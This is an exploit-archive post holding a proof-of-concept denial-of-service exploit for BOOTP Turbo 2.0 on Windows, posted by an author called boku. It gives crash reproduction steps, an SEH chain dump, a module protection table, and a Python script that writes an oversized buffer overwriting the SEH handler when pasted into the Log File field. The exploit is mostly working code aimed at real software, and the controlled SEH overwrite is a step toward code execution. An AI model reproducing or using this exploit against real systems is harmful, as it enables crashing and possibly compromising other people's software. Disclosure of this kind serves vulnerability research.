BOOTP Turbo 2.0 Denial Of Service

BOOTP Turbo version 2.0 SEH denial of service proof of concept exploit.


MD5 | 18bc50dca3e649d4b9eb74b35ddb2a9a

# Exploit Title: BOOTP Turbo 2.0 - Denial of Service (SEH)(PoC)
# Exploit Author: boku
# Date: 2020-01-22
# Software Vendor: Wierd Solutions
# Vendor Homepage: https://www.weird-solutions.com
# Software Link: https://www.weird-solutions.com/download/products/bootpt_demo_IA32.exe
# Version: BOOTP Turbo (x86) Version 2.0
# Tested On: Windows 10 Pro -- 10.0.18363 Build 18363 x86-based PC
# Tested On: Windows 7 Enterprise SP1 -- build 7601 64-bit
# Replicate Crash:
# 1) Download, Install, and Open BootP Turbo v2.0 for windows x86
# 2) Go to Edit > Settings > Click the Detailed Logging Box
# 3) Run python script, open created file 'crash.txt'
# 4) Select-All > Copy All, from file
# 5) Paste buffer in the 'Log File' text-box, Click 'OK'
# 6) Close the 'Control Service' Pop-Up Window
# 7) Crash with SEH Overwrite

# SEH chain of main thread
# Address SE handler
# 019CD254 43434343
# 42424242 *** CORRUPT ENTRY ***

# Loaded Application Modules
# Rebase | SafeSEH | ASLR | NXCompat | Version, Modulename & Path
# True | True | False | False | 4.7.3.0 [QtGui4.dll] (C:\Program Files\BOOTP Turbo\QtGui4.dll)
# True | True | False | False | 4.7.3.0 [QtCore4.dll] (C:\Program Files\BOOTP Turbo\QtCore4.dll)
# True | True | False | False | 10.00.30319.1 [MSVCP100.dll] (C:\Program Files\BOOTP Turbo\MSVCP100.dll)
# True | True | False | False | 2.0 [bootptui.exe] (C:\Program Files\BOOTP Turbo\bootptui.exe)
# True | True | False | False | 10.00.30319.1 [MSVCR100.dll] (C:\Program Files\BOOTP Turbo\MSVCR100.dll)

#!/usr/bin/python

offset = '\x41'*2196
nSEH = '\x42\x42\x42\x42'
SEH = '\x43\x43\x43\x43'
filler = '\x44'*(3000-len(offset+nSEH+SEH))

payload = offset+nSEH+SEH+filler

try:
f=open("crash.txt","w")
print("[+] Creating %s bytes evil payload." %len(payload))
f.write(payload)
f.close()
print("[+] File created!")
except:
print("File cannot be created.")

Related Posts